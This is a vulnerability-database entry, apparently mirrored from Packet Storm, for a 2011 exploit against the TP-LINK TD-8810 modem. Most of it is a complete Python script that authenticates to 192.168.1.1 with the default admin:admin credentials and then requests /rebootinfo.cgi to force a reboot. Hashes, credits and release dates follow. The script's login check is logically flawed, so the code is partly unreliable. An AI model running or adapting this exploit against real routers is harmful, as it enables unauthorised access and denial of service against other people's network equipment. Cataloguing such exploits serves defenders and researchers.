Details of VAR-E-201109-0229

ID

VAR-E-201109-0229

TITLE

TPLINK TD-8810 Cross Site Request Forgery

Trust: 0.5

sources: PACKETSTORM: 104735

DESCRIPTION

TPLINK TD-8810 cross site request forgery exploit that performs a reboot of the modem.

Trust: 0.5

sources: PACKETSTORM: 104735

AFFECTED PRODUCTS

vendor:

tplink

model:

td-8810

scope:

version:

Trust: 0.5

sources: PACKETSTORM: 104735

EXPLOIT

#!/usr/bin/python
#
#[+]Exploit Title: TPLINK TD-8810 CSRF Vulnerability Local Reboot Modem Exploit
#[+]Date: 01\09\2011
#[+]Author: C4SS!0 G0M3S
#[+]Version: TD-8810
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#

from socket import *
from time import sleep
from base64 import b64encode
import os,sys

if os.name == 'nt':
os.system("color 4f")
os.system("cls")
os.system("title TPLINK TD-8810 CSRF Vulnerability Local Reboot Modem Exploit")
else:
os.system("clear")
print '''

TPLINK TD-8810 CSRF Vulnerability Local Reboot Modem Exploit
Created by C4SS!0 G0M3S
E-mail louredo_@hotmail.com
Blog net-fuzzer.blogspot.com

'''
request = (
"GET / HTTP/1.1\r\n"
"Host: 192.168.1.1\r\n"
"User-Agent: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.2.21) Gecko/20110830 Firefox/3.6.21\r\n"
"Accept-Language: pt-br,pt;q=0.8,en-us;q=0.5,en;q=0.3\r\n"
"Accept-Encoding: gzip,deflate\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"Connection: keep-alive\r\n"
"Authorization: Basic "+b64encode("admin:admin")+"\r\n\r\n" # Using the default password
)
request2 = (
"GET /rebootinfo.cgi HTTP/1.1\r\n"
"Host: 192.168.1.1\r\n"
"User-Agent: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.2.21) Gecko/20110830 Firefox/3.6.21\r\n"
"Accept-Language: pt-br,pt;q=0.8,en-us;q=0.5,en;q=0.3\r\n"
"Accept-Encoding: gzip,deflate\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"Connection: keep-alive\r\n"
"Authorization: Basic "+b64encode("admin:admin")+"\r\n\r\n" # Using the default password
)
print "\t\t[+]Connecting in the Modem TP-LINK TD-8810..."
sleep(1)
s = socket(AF_INET,SOCK_STREAM,0)
s.connect(('192.168.1.1',80))
print "\t\t[+]Sending HTTP Request..."
sleep(1)
s.send(request)
data = s.recv(100000)
s.close()
if (int(data.split("\r\n")[0].split(" ")[1]) == "200") == 0:
print "\t\t[+]User Logged successfully."
sleep(1)
print "\t\t[+]Sending the request to shutdown the modem..."
sleep(1)
s = socket(AF_INET,SOCK_STREAM,0)
s.connect(('192.168.1.1',80))
s.send(request2)
print "\t\t[+]Exploit Sent wait your Modem Reboot... :)"
sleep(1)
s.close()
else:
print "\t\t[+]I can't log in your modem. Maybe Password Or Username is Wrong."
sleep(1)

Trust: 0.5

sources: PACKETSTORM: 104735

EXPLOIT HASH

LOCAL

SOURCE

md5:	68cd8397c279e94d4f185443f6005632
sha-1:	5edaf5e2012b3848960e69d6e9d5f0446545c94a
sha-256:	09bdf9635bf9b63fb18e4c32a5a237cf878a16ea494b709ac969f658d874aa04

md5:	68cd8397c279e94d4f185443f6005632

Trust: 0.5

sources: PACKETSTORM: 104735

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 104735

TYPE

csrf

Trust: 0.5

sources: PACKETSTORM: 104735

CREDITS

C4SS!0 G0M3S

Trust: 0.5

sources: PACKETSTORM: 104735

EXTERNAL IDS

db:

PACKETSTORM

id:

104735

Trust: 0.5

sources: PACKETSTORM: 104735

SOURCES

db:

PACKETSTORM

id:

104735

LAST UPDATE DATE

2022-07-27T09:12:26.213000+00:00

SOURCES RELEASE DATE

db:

PACKETSTORM

id:

104735

date:

2011-09-02T21:22:59

ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT HASH

LOCAL

SOURCE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

SOURCES

LAST UPDATE DATE

SOURCES RELEASE DATE